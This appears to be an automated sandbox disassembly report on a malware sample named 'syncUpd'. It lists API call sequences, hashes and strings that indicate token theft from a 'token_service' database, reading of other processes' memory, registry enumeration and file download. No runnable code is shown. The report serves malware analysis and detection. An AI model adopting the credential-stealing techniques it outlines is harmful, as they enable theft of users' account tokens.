                                                                                                                                                                                                                                                              • API String ID: 2311089104-345573653
                                                                                                                                                                                                                                                              • Opcode ID: 3cc79ba795380566e913a09732aeafe9c6e20b9f9f284254c42bf9d3b4db8e1b
                                                                                                                                                                                                                                                              • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cc79ba795380566e913a09732aeafe9c6e20b9f9f284254c42bf9d3b4db8e1b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00908AB6
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __getptd_noexit.LIBCMT ref: 00907D96
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __amsg_exit.LIBCMT ref: 00907DA3
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00908AD6
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00908AE6
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00908B03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00908B16
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(05B), ref: 00908B2E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: 05B$05B
                                                                                                                                                                                                                                                              • API String ID: 3470314060-1918097640
                                                                                                                                                                                                                                                              • Opcode ID: 30fd09fcb36eb232e569ea581c467d664f2ee35282cbedbbd802be78d6068a8c
                                                                                                                                                                                                                                                              • Instruction ID: 53a9af753345f04eb2267cc9eb9f75cca839fc21453cb0d5d006690bb9b7c711
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30fd09fcb36eb232e569ea581c467d664f2ee35282cbedbbd802be78d6068a8c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C601C471F05721AFCB20AFA4980575FBB68BF45721F404026E850A76D1CB786981CBD9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e40bc669b62f72619cb0d277483ebd7ad11248d88b4231bb2187a335cb0e4ec6
                                                                                                                                                                                                                                                              • Instruction ID: e8adb4a0f236e88945aaf8a804f33f3cb6ab07c77feb429266f95f561d430f4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e40bc669b62f72619cb0d277483ebd7ad11248d88b4231bb2187a335cb0e4ec6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7571D975910608AFDB14EBE4DC95FEEB7B9BF48710F108508F515AB290DB74A905CF60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 00405DE7
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 008F6016
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F604E
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008F6096
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008F60BA
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008F60E3
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008F6111
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 008F6150
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F615A
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F6167
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00624B54,00000000,?,0041D774,00000000,?,00000000,00000000,?,0062496C), ref: 00904BD4
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00904BDB
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00904BFC
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00904C16
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00904C24
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904C50
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 2774356765-2766056989
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041884F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041886F
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041887F
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041889C
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004188AF
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00423530), ref: 004188C7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID: 05B
                                                                                                                                                                                                                                                              • API String ID: 3470314060-3788103304
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                              • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: memset.MSVCRT ref: 008F6F4B
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008F6F71
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008F6FE8
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: StrStrA.SHLWAPI(00000000,0041DD64,00000000), ref: 008F7044
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: GetProcessHeap.KERNEL32(00000000,?), ref: 008F7089
                                                                                                                                                                                                                                                                • Part of subcall function 008F6F07: HeapFree.KERNEL32(00000000), ref: 008F7090
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEB8), ref: 008F723D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F727F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEBC), ref: 008F7291
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F72C6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEC0), ref: 008F72D7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,00000000), ref: 008F730A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00624E34,0041DEC4), ref: 008F7324
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 008F7332
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3191641157-0
                                                                                                                                                                                                                                                              • Opcode ID: 9397bf8d36376b94ab8d5b1f9d61ba5fef7cd9a4105ae52593d090ef9b88bb39
                                                                                                                                                                                                                                                              • Instruction ID: c88a4264b3e8c07329cd52604006222034b3075fa4266bee7b3665f979fab47f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9397bf8d36376b94ab8d5b1f9d61ba5fef7cd9a4105ae52593d090ef9b88bb39
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71315E71905509AFDB14EBB4DD99EFE7776FF48301F105118F602AB2A0DA34AD02CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00413BDF
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413C0D
                                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
                                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413D73
                                                                                                                                                                                                                                                                • Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                              • String ID: @$Z>A
                                                                                                                                                                                                                                                              • API String ID: 2950663791-2427737632
                                                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F6F4B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008F6F71
                                                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008F6FE8
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DD64,00000000), ref: 008F7044
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008F7089
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 008F7090
                                                                                                                                                                                                                                                                • Part of subcall function 008F8E87: vsprintf_s.MSVCRT ref: 008F8EA2
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 008F718C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2698061284-0
                                                                                                                                                                                                                                                              • Opcode ID: 7f3f322cfc82e394cd4b1814abd93527b8f77dc1ed81e7b0c363f998f6c98cb9
                                                                                                                                                                                                                                                              • Instruction ID: 0e92f9229732ccc42a58fa8f3c2e78d07f4ef716ce96f5618970e5cd5e9ce0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f3f322cfc82e394cd4b1814abd93527b8f77dc1ed81e7b0c363f998f6c98cb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA610BB590415C9BEB24DB64CC45FE9B7B8FF48304F0081E9E649A6145DBB06BC9CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F154E
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F14DB
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RtlAllocateHeap.NTDLL(00000000), ref: 008F14E2
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008F14FE
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008F151C
                                                                                                                                                                                                                                                                • Part of subcall function 008F14C7: RegCloseKey.ADVAPI32(?), ref: 008F1526
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008F1576
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008F1583
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0042159C), ref: 008F159E
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
